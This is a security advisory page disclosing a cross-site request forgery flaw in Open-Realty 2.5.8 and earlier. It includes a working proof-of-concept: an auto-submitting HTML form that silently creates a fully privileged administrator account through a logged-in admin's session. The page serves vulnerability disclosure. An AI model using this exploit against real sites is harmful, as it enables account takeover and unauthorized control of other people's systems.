Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs
Brought to you by:
Suppliers of:
New vulnerability? New tool? Tell us
Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner
Open-Realty 2.5.8 and lower versions are vulnerable to Cross Site Request Forgery vulnerability
Credit:
The information has been provided by Aung Khant .
The original article can be found at: http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_csrf
Vulnerable Systems:
* Open-Realty 2.5.8 and prior
Open-Realty 2.5.8 and lower versions contain a flaw that allows aremote Cross-site Request Forgery (CSRF / XSRF) attack. The flawexists because the application does not require multiple steps orexplicit confirmation for sensitive transactions for majority ofadministrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification.
PROOF-OF-CONCEPT/EXPLOIT
<!-- Add Admin User -->
<form action="http://localhost/orealty/admin/index.php?action=user_manager";
method="POST">
<input type="hidden" name="action" value="createNewUser" />
<input type="hidden" name="edit_user_name" value="user" />
<input type="hidden" name="edit_user_pass" value="pa55w0rd" />
<input type="hidden" name="edit_user_pass2" value="pa55w0rd" />
<input type="hidden" name="user_first_name" value="hacker" />
<input type="hidden" name="user_last_name" value="smith" />
<input type="hidden" name="user_email"
value="hacker@yehg.net" />
<input type="hidden" name="edit_active" value="yes" />
<input type="hidden" name="edit_isAdmin" value="yes" />
<input type="hidden" name="edit_isAgent" value="yes" />
<input type="hidden" name="limitListings" value="-1" />
<input type="hidden" name="edit_limitFeaturedListings"
value="-1" />
<input type="hidden" name="edit_userRank" value="0" />
<input type="hidden" name="edit_canEditAllListings" value="yes" />
<input type="hidden" name="edit_canEditAllUsers" value="yes" />
<input type="hidden" name="edit_canEditSiteConfig" value="yes" />
<input type="hidden" name="edit_canEditMemberTemplate" value="yes" />
<input type="hidden" name="edit_canEditAgentTemplate" value="yes" />
<input type="hidden" name="edit_canEditPropertyClasses" value="yes" />
<input type="hidden" name="edit_canEditListingTemplate" value="yes" />
<input type="hidden" name="edit_canViewLogs" value="yes" />
<input type="hidden" name="edit_canModerate" value="yes" />
<input type="hidden" name="edit_canFeatureListings" value="yes" />
<input type="hidden" name="edit_canEditListingExpiration"
value="yes" />
<input type="hidden" name="edit_canExportListings" value="no" />
<input type="hidden" name="edit_canPages" value="yes" />
<input type="hidden" name="edit_canVtour" value="yes" />
<input type="hidden" name="edit_canFiles" value="yes" />
<input type="hidden" name="edit_canUserFiles" value="yes" />
<input type="hidden" name="edit_canManageAddons" value="yes" />
<script>document.forms[0].submit()</script>
</form>
Disclosure Timeline:
2012-03-05: Open-Realty 2.5.8 in End-of-Support/Maintenance circle
2012-11-17: Vulnerability disclosed
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by